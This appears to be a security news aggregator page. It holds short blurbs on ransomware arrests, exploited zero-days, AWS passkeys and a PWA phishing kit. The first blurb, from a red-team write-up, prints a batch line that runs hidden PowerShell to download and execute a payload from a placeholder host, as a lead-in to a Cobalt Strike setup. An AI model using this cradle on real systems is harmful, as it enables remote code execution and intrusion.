Hacking Pulse Secure for Redteaming
The code we used for the batch script is below. @echo off powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://your-ip/payload))” Setting up Cobalt Strike Now…
Author: Cybernoz
Ukraine Arrests Cryptor Specialist Aiding Conti and LockBit Ransomware
In a major victory against ransomware operators, Ukrainian police have apprehended a Ukrainian national suspected of aiding the notorious ransomware groups, Conti and LockBit for…
Black Basta Ransomware Possibly Exploited Windows Bug As 0-Day
The Black Basta ransomware gang may have exploited a Windows privilege escalation vulnerability as a zero-day before it was patched, new evidence suggests. Symantec researchers…
SpaceX sued by engineers fired after accusing Elon Musk of sexism – Training & Development
Rocket maker SpaceX and its CEO Elon Musk were sued by eight engineers who say they were illegally fired for raising concerns about alleged sexual…
AWS adds passkeys support, warns root users must enable MFA
Amazon Web Services (AWS) has introduced FIDO2 passkeys as a new method for multi-factor authentication (MFA) to enhance account security and usability. Additionally, as announced…
US health dept says UnitedHealth can notify patients of data breach – Security
US healthcare providers can ask UnitedHealth Group to notify people whose data was exposed during a hack on the company’s Change Healthcare unit in February, according…
Google warns of actively exploited Pixel firmware zero-day
Google has released patches for 50 security vulnerabilities impacting its Pixel devices and warned that one of them had already been exploited in targeted attacks…
ADHA claims $1m in service credits from Accenture – Cloud – Hardware – Software
The Australian Digital Health Agency has claimed $1.04 million in service credits from Accenture, the outsourced operator of My Health Record infrastructure, since January 2018.…
CISA warns of criminals impersonating its employees in phone calls
Image: Midjourney Today, the Cybersecurity and Infrastructure Security Agency (CISA) warned that criminals are impersonating its employees in phone calls and attempting to deceive potential…
Black Basta Ransomware Suspected of Exploiting Windows 0-day Before Patch
The notorious Black Basta ransomware group is believed to have taken advantage of a high-severity Windows privilege escalation vulnerability (CVE-2024-26169) as a zero-day exploit before…
Conti And LockBit Ransomware Cryptor Developer Arrested By Ukraine Police
Ukraine National Police have arrested a man they say helped disguise ransomware used by Russia-based threat groups. The 28-year-old cryptor developer was unnamed in Ukraine…
New phishing toolkit uses PWAs to steal login credentials
A new phishing kit has been released that allows red teamers and cybercriminals to create progressive web Apps (PWAs) that display convincing corporate login forms…